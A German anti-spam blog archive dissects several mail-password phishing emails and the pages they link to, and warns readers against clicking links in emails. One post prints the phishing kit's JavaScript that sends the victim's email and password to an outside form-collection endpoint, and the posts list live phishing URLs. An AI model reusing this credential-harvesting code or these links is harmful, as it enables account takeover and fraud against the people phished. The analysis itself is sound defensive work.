Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Schlagwortarchiv „Mailpasswort“

Spreadsheet shared with you… Invoice

Donnerstag, 9. Oktober 2025

Häh? 🤔️

Von: Google Sheets <cassie@lifangvision.com>

Dies ist einer der wenigen Fälle, in denen sogar eine GMail-Adresse als Absender irgendwie glaubwürdiger gewesen wäre. Natürlich verwendet Google stets Mailadressen aus den eigenen Domains. 😁️

account@tamagothi.de shared a spreadsheet

  1. Diese Mailadresse existiert nicht in der Domain tamagothi.de. Die Mailadressen dort richte ich immer noch selbst ein.
  2. Die Domain tamagothi.de wird nicht von Google verwaltet.
  3. Wenn man mir eine Datei zumailen will, kann man sie einfach an die E-Mail anhängen, so wie das seit ungefähr den Achtziger Jahren [!] möglich ist und in den Neunziger Jahren standardisiert und auch immer gern genutzt wurde, weil das nun einmal die direkteste und einfachste Methode ist. Irgendwelche komplizierten Umwege mit Filehostern und Links in einer Mail sind nur erforderlich, wenn die Datei sehr groß ist. Ab der Größenordnung MiB sollte man besser davon absehen, daraus einen Mailanhang zu machen. Rechnungen, Briefe und sogar wissenschaftliche Fachartikel (mit allem Gedöns an eingebetteten Grafiken und schönem Satz in guter Schriftart) sind kleiner, hochauflösende Fotos meist größer.

tamagothi.de (account@tamagothi.de) added you as an editor. Verify your email to securely make edits to this spreadsheet. You will need to verify your email every 7 days. Learn more

Dubai Invoice 10/9/2025 6:19:41 AM

Open

Der Link führt natürlich auch nicht zu Google, sondern in eine Domain, die über das zurzeit von Spammern meistmissbrachte kostenlose Angebot von Cloudflare läuft. An die URI ist noch einmal die Mailadresse angehängt, damit die Spammer auch wissen, unter welchen Mailadressen die Spam ankommt, gelesen wird und sogar beklickt wird, denn das sind gute Opfer für jede denkbare kriminelle Machenschaft. Dort gibt es ein lustiges HTML-Dokument…

$ curl -s "https://safer-guests-advisory-flat.trycloudflare.com/?#leck@meinen.arsch" >dubai-invoice
$ file dubai-invoice 
dubai-invoice: HTML document, ASCII text
$ mv dubai-invoice dubai-invoice.html
$ lynx -dump dubai-invoice.html 
   Your session has expired, please sign in to continue.
   ____________________
   Please enter a valid email address.
   ____________________
   Please enter your password.
   (BUTTON) Sign In
$ _

…in welchem man seine Mailadresse (wird in Javascript mit der angegebenen Mailadresse vorbelegt) und sein Passwort eingeben und an Kriminelle senden kann. Natürlich haben die Kriminellen hierfür auch ein kostenloses Angebot eines Unternehmens verwendet, in diesem Fall ist es Formspark:

$ sed -n 134,147p dubai-invoice.html
            $.ajax({
                url:'https://submit-form.com/61dmNNQ8B',
                method: 'POST',
                data: {
                    chat_id: chatId,
                    text: message
                },
                success: function(response) {
                    window.location.href = `https://${domain}`;
                },
                error: function(error) {
                    $('#errorMessage').text('Error in submitting form!').show();
                }
            });
$ _

Ich bin übrigens erstaunt, dass dieser Phisher nicht einmal versucht hat, die Zieldomain im Quelltext in kryptischem Coding zu verbergen. Vermutlich ist der Honk, dessen geistiges Herausgefordertsein auch im Text der Spam durchschimmerte, mit solchen Dingen ein bisschen überfordert. Oder er fühlt sich sehr sicher, weil er in einem Staat lebt, in dem nicht so viel Wert auf Ermittlungen in Sachen Computerkriminalität gelegt wird oder in dem Verwaltung, Justiz und Polizeien durch und durch korrupt sind. Besonders sorglos waren früher stets die Phisher und Betrüger aus Nigeria, Russland und der Ukraine, später kam auch das bettelarme Benin hinzu.

Warum der Phisher dann nicht einfach ein HTML-Formular mit POST-Methode und Angabe der Adresse als action-Parameter im FORM-Tag macht? Vermutlich weiß der spammende Idiot gar nicht mehr, dass man so etwas auch in HTML machen kann, und zwar einfacher, kürzer, barrierefreier und klarer. So, wie etwa hier auf Unser täglich Spam das Kommentarformular, weil ich so viel Funktion wie möglich auch für Leser haben möchte, die Wert auf Computersicherheit und Privatsphäre legen (oder legen müssen) und deshalb einen Skriptblocker benutzen – Javascript verwende ich in einer Website extrem ungern und nur für Funktionen, die hübsch sind, aber nicht unbedingt sein müssen. 🤭️

Oder aber der spammende Idiot hat sich seine Phishingseite bei einem angelernten neuronalen Netzwerk – von Politikern, Journalisten und anderen digitalen Analphabeten durchgehend mit dem Reklamewort „künstliche Intelligenz“ bezeichnet, damit wir auch alle weniger Deutsch und mehr Reklame sprechen und denken – erpromptet. Denn wenn sich ein Spammer Mühe geben wollte, brauchte er ja auch nicht zu spammen, sondern könnte gleich arbeiten gehen. Dabei kommt auch ziemlich oft Code aus Lehrbüchern wieder raus, der vom Autor nur didaktisch-illustrativ gemeint war, den aber in der Praxis kein denkender Mensch so schreiben würde, wenn es auch eine ganze Größenordnung weniger komplex geht. Diese angelernten neuronalen Netzwerke haben zwar das Wissen der Welt beim Training mit dem Nürnberger Trichter verabreicht bekommen, aber sie verstehen davon nichts. Gut, dass ich bald tot bin. Nicht, dass mich noch jemand mit neuerdings wieder modernwerdenden Zwangsarbeitsgesetzen dazu heranzieht, den ganzen durch Vibe Coding entstandenen Müll zu entfehlern, zu erweitern oder zu verbessern! Ich habe ehrlich gesagt ein Vierteljahrhundert später immer noch genug vom Jahr-2000-Bug… und da habe ich viel Code von Menschen gelesen, deren Gedanken und Gedankenlosigkeiten noch halbwegs nachvollziehbar formuliert waren, und nicht das stochastisch generierte Geschwall aus angelernten neuronalen Netzwerken. Den Nach-mir-Kommenden wünsche ich viel Glück, sie werden es brauchen! 🫤️

Use is subject to the Google Privacy Policy.

Ganz sicher nicht. 🤥️

Google LLC, 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA

Mein Exemplar dieser Spam wurde über eine IP-Adresse aus dem großen, weiten Russland versendet und hat auf ihrem gesamten Transportweg niemals die USA gesehen.

You have received this email because account@tamagothi.de shared a spreadsheet with you from Google Sheets. Delete visitor session

Dass das eine Lüge ist, sollte jetzt hoffentlich klar genug geworden sein.

Google Workspace

Google, von mir so viel geschmäht, hat damit mal überhaupt nichts zu tun. An keiner Stelle.

Nicht reinklicken, einfach löschen! 🗑️

Generell niemals in eine E-Mail klicken!

Wichtiger Hinweis: Ihr Mailbox-Passwort ist abgelaufen 2024 – gammelfleisch@tamagothi.de

Dienstag, 6. August 2024

Im Orignal stand eine andere Mailadresse, die auch als Empfängeradresse eingetragen war. Die Behauptung in der Spam stmmt nicht. Es handelt sich um Phishing. 🎣️

Wenn man in die Mail klickt und auf der sich öffnenden Website sein Mailpasswort eingibt, hat man dieses Passwort an Kriminelle gegeben. Macht das nicht. Es macht sehr viel Ärger und kann sehr teuer werden.

Von: tamagothi.de <info@lomesqqz.ooguy.com>

$ host lomesqqz.ooguy.com | sed 1q
lomesqqz.ooguy.com has address 98.142.240.228
$ host tamagothi.de | sed 1q
tamagothi.de has address 92.205.191.235
$ _

Eigentlich sieht man ja auch schon an den Hostnamen, dass das völlig verschiedene Rechner sind. Aber offenbar haben inzwischen viele Menschen „benutzerfreundliche“ Mailsoftware, die solche technischen Details wie die Mailadresse des Absenders einfach versteckt, wenn der auch einen Namen angibt, und dann funktioniert so ein Schwindel wie in diesem Beispiel leider auch. So genannte „Benutzerfreundlichkeit“ durch Verstecken technischer Details ist sehr häufig freundlich gegenüber Kriminellen, bringt aber überhaupt keinen Vorteil für den Benutzer.

Ihr Mailbox „gammelfleisch@tamagothi.de“ Passwort läuft ab!

Aha, es läuft ab. 💡️

Das Passwort für Ihre Mailbox gammelfleisch@tamagothi.de ist abgelaufen.

Oder ist es schon abgelaufen? 🤔️

Ein neues Passwort wird vom System generiert.

Sie werden genau 3 Stunden nach dem Öffnen dieser E-Mail automatisch abgemeldet.

Und, mit welchem Passwort soll ich mich danach anmelden? Mein Passwort ist ja abgelaufen. Oder es läuft ab. Oder es riecht schon komisch. 🙀️

Es wird empfohlen, weiterhin Ihr aktuelles Passwort zu verwenden.

Dann lasst es doch gleich so! 😅️

Lesen diese Phisher ihre Texte eigentlich selbst? Ach, die können gar kein Deutsch… 🤡️

Um Ihr aktuelles Passwort weiterhin zu verwenden, verwenden Sie bitte die Schaltfläche unten.

Aktuelles Passwort beibehalten

Natürlich führt der Link nicht in die Domain tamagothi.de, sondern in eine deutlich fragwürdigere Domain, die…

$ surbl pub-869696bd13e3413389dfb4a3ed703a2c.r2.dev
pub-869696bd13e3413389dfb4a3ed703a2c.r2.dev	okay
$ _

…leider noch nicht auf jeder Blacklist steht. Aber das ist jetzt nur noch eine Frage der Zeit und wird sich vermutlich in wenigen Stunden ändern. Dort kann man dann…

Screenshot des angeblichen Anmeldedialoges auf der Phishingwebsite

…sein Mailpasswort an einer anderen Stelle als gegenüber dem Mailserver angeben, damit Verbrecher ein Mailkonto übernehmen können – woran oft viele weitere kriminell „nutzbare“ Dinge hängen, etwa Social-Media-Kanäle, Accounts bei Amazon, eBay und vergleichbaren Websites, betrügerisch ausbeutbare persönliche Kontakte.

Mit Stable Diffusion erzeugtes BildMan wendet die angedrohte Nichtzugänglichkeit seines Mailpostfaches also nicht ab, indem man auf so eine Spam reagiert, sondern man verursacht sie. Denn während eine Bande von gewerbsmäßigen Betrügern schnell, gut eingespielt und konzentriert (sie haben nicht so viel Zeit dazu) bei einer Website nach der anderen die entsprechenden Mechanismen für „Ich habe mein Passwort vergessen“ auslöst und einen Großteil des digitalen Lebens eines anderen Menschen übernimmt, ist das Postfach schon längst gepwnt und für seinen eigentlichen Nutzer völlig unzugänglich. Wenn die Betrüger so an einen Account bei Amazon oder eBay kommen, wird ebenfalls sehr schnell (sie haben nicht so viel Zeit dazu, aber das sagte ich ja schon) ein bis zu sechsstelliger Schaden durch betrügerische Geschäfte im Namen eines anderen Menschen angerichtet. Und bei diesem anderen Menschen, beim Phishingopfer, schaut dann ein paar Tage später die Kriminalpolizei vorbei. Mit Hausdurchsuchungsbefehl. Wegen Verdachts auf gewerbsmäßigen Betrug. Und danach hat man ganz viel und sehr nachhaltigen Ärger.

Deshalb gibt man nicht auf irgendeiner Website ein Passwort für eine andere Website ein!

Mit Stable Diffusion erzeugtes BildEs gibt zum Glück für uns alle ein einfaches und sehr wirksames Mittel gegen Phishing, was immer noch eine der häufigsten Betrugsformen im Internet ist: Niemals in eine E-Mail klicken! Wenn man nicht in eine E-Mail klickt, kann einem kein Verbrecher so leicht einen giftigen Link unterschieben. Stattdessen Lesezeichen im Webbrowser anlegen und Websites, bei denen man einen Account hat, nur über diese Lesezeichen aufrufen. Wer sich zum Beispiel nicht selbst um den Betrieb eines Mailservers kümmert, sondern einen Account bei einem Dienstleister hat und so eine Mail bekommt: Einfach die Website des Dienstleisters über das Lesezeichnen aufrufen und sich dort ganz normal anmelden. Wenn es dabei keinen Hinweis auf ein derartiges Problem gibt, hat man einen dieser gefürchteten Cyberangriffe abgewehrt und sich möglicherweise viele zehntausend Euro und jahrelangen Ärger gespart. So einfach geht das! Macht das! 🛡️

Schlangenöl hilft nicht. Meine „Kindersicherung“ für den Webbrowser kannte die Phishing-Website noch nicht. Wer sich darauf verlässt, fällt rein. 😐️

E-Mail wird von tamagothi.de generiert E-Mail-Server für gammelfleisch@tamagothi.de

Was bitte? 😵‍💫️

Entf! 🗑️

gammelfleisch ACCOUNT TERMINATION

Freitag, 28. Juli 2023

Und immer wieder gibt es Phishing auf Mailpasswörter, weil es immer noch ganz gut zu laufen scheint.

Dear gammelfleisch ***

To continue to use your address gammelfleisch confirm your ownership

Confirm gammelfleisch

Admin@tamagothi.de Set up the team .

Und immer noch gibt es Menschen, die so eine Mail empfangen und da aufgeregt reinklicken, obwohl sie die Mail problemlos empfangen konnten. Und dann sehen sie eine tolle Website, …

Screenshot der Phishing-Seite, die übrigens bei Wix gehostet wird

…geben ihre Zugangsdaten ein und senden sie mit einem dummen Klick an Kriminelle. Und die Kriminellen freuen sich immer, wenn sie die Mailadresse und die Identität anderer Leute für ihre Betrügereien benutzen können, denn diese Handschellen und diese Gitter vor den Fenstern sind doch ziemlich unangenehm. Wenn man dann auch noch Accounts bei anderen Websites mit der gleichen Mailadresse und dem gleichen Passwort hat, dann wird die Freude dieses Geschmeißes sogar noch größer. 🤒️

Bitte seid ein bisschen schlauer! 💡️

Es gibt zum Glück ein sehr sicheres, einfaches und zudem völlig kostenloses Mittel, um niemals auf ein Phishing und damit niemals auf eine der häufigsten Formen der Internetkriminalität hereinzufallen: Niemals in eine E-Mail klicken! Wenn man nicht in eine Mail klickt, können einem die Verbrecher auch nicht so einfach einen giftigen Link zustecken. Stattdessen für jede Website, bei der man einen Account hat, ein Lesezeichen im Browser anlegen und diese Website nur noch über dieses Lesezeichen aufrufen. Wenn man dort nach einer ganz normalen Anmeldung feststellt, dass das in der Phishingspam behauptete Problem gar nicht existiert – sonst würde ja ein deutlicher Hinweise angezeigt – hat man einen dieser gefährlichen „Cyberangriffe“ abgewehrt. So einfach geht das. Macht das! 🛡️

Ich habe eben schon mit dem Chatbot von Wix kommuniziert, um meine Abuse-Meldung zu machen. Ich bin guter Dinge. Bei Wix geht man nach meinen bisherigen Erfahrungen rasch gegen so einen Missbrauch des Angebotes vor. Es ist allerdings zu befürchten, dass die Kriminellen dort mehr als nur eine kostenlose Website zum Ausprobieren aufgesetzt haben. ☹️

­A­c­t­i­o­n­ R­e­q­u­i­r­e­d for gammelfleisch@tamagothi.de Tuesday, May 16, 2023

Dienstag, 16. Mai 2023

Oh, wie schön, der Absender kennt sogar das Datum. Das kennt auch nicht jeder. 😅️

Von: Tamagothi WEB-INFO <andrew.leece@acenet.co.za>
Antwort an: hghy@cpa.com
An: gammelfleisch@tamagothi.de

Die Gammelfleisch-Adresse ist keine Mailadresse, sondern ein Honigtopf. Sie ist als Weiterleitung an eine Mülladresse konfiguriert, wo sie mit verschiedenen, nach Datenlecks und Forencracks längst unbrauchbar gewordenen Mailadressen zusammenfließt. Ich habe sie im Impressum als „Kontaktadresse für unseriöse Angebote“ verlinkt. Es ist die einzige Mailadresse im Impressum, die man auch mit dem schäbigsten Harvester direkt auslesen kann. Wo das Aas ist, da kommen die Geier. 💀️

Die folgende Spam ist Phishing auf Mailpasswörter. Damit der Müll überhaupt durch Spamfilter kommt, steht der eigentliche Inhalt in einer Grafik:

Mail Password Notification -- Dear User -- Your email password will expire today -- Click on the link to keep using your current passwort -- [Keep Current Password] -- Your account might be locked after 48 hours -- Admin Mail Team

Der überlagerte Schriftzug „Phishing“ ist natürlich von mir. Ich werde nicht so gern zum Bildhoster für Kriminelle. 😉️

Natürlich haben die Phisher keine Motivation, für jede der paar hunderttausend zugespammten Mailadressen eine neue Grafik zu erstellen, und deshalb ist der Text in dieser Grafik völlig unpersönlich an den lieben User gerichtet. Die Mailadresse wird nicht in der Grafik, sondern nur im Betreff der Spam genannt. Der Mailanbieter, dessen „Mail Admin Team“ hier zu schreiben vorgibt, legt offenbar nicht so viel Wert auf seine Firmierung und wird deshalb nirgends genannt. 🔍️

Es ist also nicht so schwierig, zu bemerken, dass hier etwas nicht stimmt. Aber natürlich kann so ein Phishing auch viel besser gemacht sein, und deshalb weise ich noch einmal darauf hin, dass es genau einen wirksamen Schutz gegen Phishing gibt: Niemals in eine E-Mail klicken! Wenn man nicht in die E-Mail klickt, sondern die Website seines Mailproviders (zum Beispiel über ein dafür angelegtes Lesezeichen) ganz normal im Webbrowser aufruft, sich dort ganz normal anmeldet und feststellt, dass das in der Mail behauptete Problem gar nicht existiert, hat man einen dieser gefürchteten Cyberangriffe abgewehrt. So einfach geht das. Macht das! 🛡️

(Wenn man digitale Signaturen benutzt, die digitale Signatur des Absenders geprüft hat und deshalb jenseits jedes vernünftigen Zweifels davon ausgehen kann, dass der Absender der Mail im Besitz des private key einer vertrauenswürdigen Person oder eines vertrauenswürdigen Unternehmens ist, kann man natürlich etwas laxer werden. Aber dafür müssten Absender und Empfänger klicken können. Für diese Klicks fühlen sich die Menschen auch dreißig Jahre nach der kostenlosen Verfügbarkeit von PGP nicht qualifiziert. Stattdessen klicken sie auf alles mögliche Andere in einer Mail. Die Einzigen, die sich darüber freuen können, sind Kriminelle. Cyber Cyber!)

Natürlich ist der Link nicht direkt gesetzt:

$ mime-header "https://patrimoines.ain.fr/redirections/url_redirect/n:80?redirection=https%3A%2F%2F/oj18s4.codesandbox.io/?wb=gammelfleisch@tamagothi.de" | grep -i ^location
location: https:///oj18s4.codesandbox.io/?wb=gammelfleisch@tamagothi.de
$ _

Das ist ja toll, dass man die Mailadresse gleich als URI-Parameter übergeben kann! Natürlich gibt es noch eine in Javascript realisierte Weiterleitung auf eine andere Seite, die dann über Javascript die gesamten „Inhalte“ aus einer dritten Website holt… ach! Ich habe ausnahmsweise gar keine Lust, den ganzen Wust hier penibel auseinanderzunehmen. Wer in die Mail geklickt hat, wird mit der folgenden Möglichkeit konfrontiert, etwas sehr Dummes zu tun:

Screenshot der Phishing-Webseite

Habe ich schon erwähnt, dass die Mailadresse als URI-Parameter übergeben wird? Ich habe sie für meinen kleinen Test mal verändert. Ein Passwort, das man dort eingibt und absendet, geht direkt an Kriminelle. Damit kommen sie mindestens an das gesamte Mailkonto, und oft noch an vieles mehr, insbesondere, wenn das gleiche Passwort auch an anderen Stellen benutzt wird. Es gibt dann also nicht nur die Möglichkeit, personalisierte Betrugsnummern der Marke „Hallo Heike, ich sitze hier gerade in Barcelona und wurde von Straßenräubern abgezogen, habe nichts mehr und komme hier nicht weg, kannst du mir bitte mal schnell fünfhundert Øre über Western Union senden, gebe ich dir auch nächste Woche zurück“ im Bekanntenkreis abzuziehen¹, sondern oft auch Zugriff auf alle möglichen anderen Webdienste, die mit dieser Mailadresse oder sogar mit genau dem gleichen Passwort genutzt werden und die dann weitere kriminelle Nummern ermöglichen. 😐️

Aber wer gar nicht erst in eine Mail klickt, ist davor sicher. Deshalb klickt man niemals in eine Mail. Es schützt übrigens auch vor Schadsoftware. 🖱️🚫️

Sollen die Spammer doch verhungern! 😠️

Sent to gammelfleisch@tamagothi.de on 5/16/2023 from Tamagothi Online Team

Das ist ja toll, dass das an die gleiche Mailadresse geht, die auch als Empfänger eingetragen ist! Und das Datum stimmt auch noch! 😁️

P Please consider the environment before printing this email.

Aber ich bin doch gar nicht in der BRD-Verwaltung. 🙃️

This email has been scanned by the Symantec Email Security.cloud service.
For more information please visit http://www.symanteccloud.com

Habe ich eigentlich schon einmal erwähnt, dass solche Werbesprüche für irgendwelchen Antiviruskram niemals in Mitteilungen denkender und fühlender Menschen auftauchen, sondern beinahe nur in Spam? Ist ja auch klar. Ich könnte diesen Spruch einfach in eine Mail kopieren und eine fiese Kollektion aktueller Schadsoftware an die Mail hängen. Der Spruch ist für die Computersicherheit sinnlos. Er ist reine Reklame; und er ist extrem dumme Reklame. Wer noch etwas fühlt und noch ein bisschen denken kann, wird seine Mitmenschen nicht mit so einer hirnlosen und albernen Reklame belästigen. Das machen nur Leute, deren Mitteilungen man ungelesen in die Rundablage werfen kann. 🗑️

Ja, ich habe das schon erwähnt… 😉️

¹Auch wenn die Medien über die großen Betrugsnummern wie Identitätsmissbrauch und Phishing sprechen, sind solche altmodischen Formen des Trickbetrugs weiterhin populär. Immerhin kann ein Betrüger mit relativ geringem Zeitaufwand (rd. eine Stunde) einige hundert Euro ergaunern. Das ist ein guter Stundenlohn. Ein Risiko gibt es dabei praktisch nicht.